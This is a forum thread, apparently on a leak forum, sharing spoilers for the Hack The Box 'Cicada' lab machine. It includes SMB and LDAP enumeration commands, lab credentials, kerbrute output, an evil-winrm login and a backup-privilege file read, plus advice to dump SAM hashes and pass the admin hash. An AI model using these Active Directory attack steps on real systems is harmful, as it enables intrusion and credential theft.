[HTB] - Cicada
by kevindragonfly - Saturday September 28, 2024 at 03:19 PM
#31
it was one of the easiest box
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#32
someone got root in 3min 33sec tell me how that can be done please
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#33
you can dump sam and system with emily and then pash the admin hash with evil-winrm ... you gonna find root.txt in the desktop
ofc you can crack the password if you want but you don't need to
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#34
and you can do that in 3 min
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#35
(09-28-2024, 08:48 PM)sedlyf Wrote: Easy User and Root

User :

`evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' `

Root :

`robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B`

`type C:\Users\Public\root.txt`

thank you dude, thats help me a lot
Reply
#36
(09-28-2024, 07:21 PM)wtfduw Wrote: You can find an open SMB share: smbclient  \\\\IP_ADDRESS\\DEV -N
And inside of it you'll find an HR note with a password: Cicada$M6Corpb*@Lp#nZp!8
There's another share named DEV with access denied

can you tell me why when I try to enter the command dir or ls I get an error: 

smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*

smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

P.S. That's it, I figured it out
Reply
#37
(09-29-2024, 04:50 AM)Mas_PangaREP Wrote:
(09-28-2024, 08:48 PM)sedlyf Wrote: Easy User and Root

User :

`evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' `

Root :

`robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B`

`type C:\Users\Public\root.txt`

thank you dude, thats help me a lot

do it right way via sam, security and system to get interactive shell
Reply
#38
How did you guys got access to david.orelious? I saw password for emily is there.
Want to improve, thanks in advance

[Edit]

Ok i found it. It's ldapdomaindump ldap://10.10.11.35 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 

which was at the beggining of the thread

I tried windapsearch.py, bloodhound-python, and ldapsearch but couldn't make any of this work. Thanks for new tool


[Edit]

It was in the bloodhound. I missed it.
Reply
#39
(09-28-2024, 08:23 PM)Detector6 Wrote:
(09-28-2024, 08:04 PM)notluken Wrote:
(09-28-2024, 07:41 PM)grieving7 Wrote:
(09-28-2024, 07:31 PM)hackemall Wrote: kerbrute    Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 >  Using KDC(s):
2024/09/28 14:25:50 >      10.10.11.35:88

2024/09/28 14:25:51 >  [+] VALID USERNAME:    michael.wrightson@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    sarah.dantelia@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    john.smoulder@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    emily.oscars@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    david.orelious@cicada.htb
2024/09/28 14:25:51 >  Done! Tested 5 usernames (5 valid) in 0.073 seconds

Which command did you run?

kerbrute userenum --dc <IP> -d cicada.htb <PATH-TO-WORDLIST>

that doesn't explain the wordlist. orelious is not a common surname

I used crackmapexec --rid-brute flag
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#40
(09-28-2024, 07:31 PM)hackemall Wrote: kerbrute    Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 >  Using KDC(s):
2024/09/28 14:25:50 >      10.10.11.35:88

2024/09/28 14:25:51 >  [+] VALID USERNAME:    michael.wrightson@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    sarah.dantelia@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    john.smoulder@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    emily.oscars@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    david.orelious@cicada.htb
2024/09/28 14:25:51 >  Done! Tested 5 usernames (5 valid) in 0.073 seconds

Hello sr, I can ask you if you know where I can find a good list of firstName.lastName or last name words to generate
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,348 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 350 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 646 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)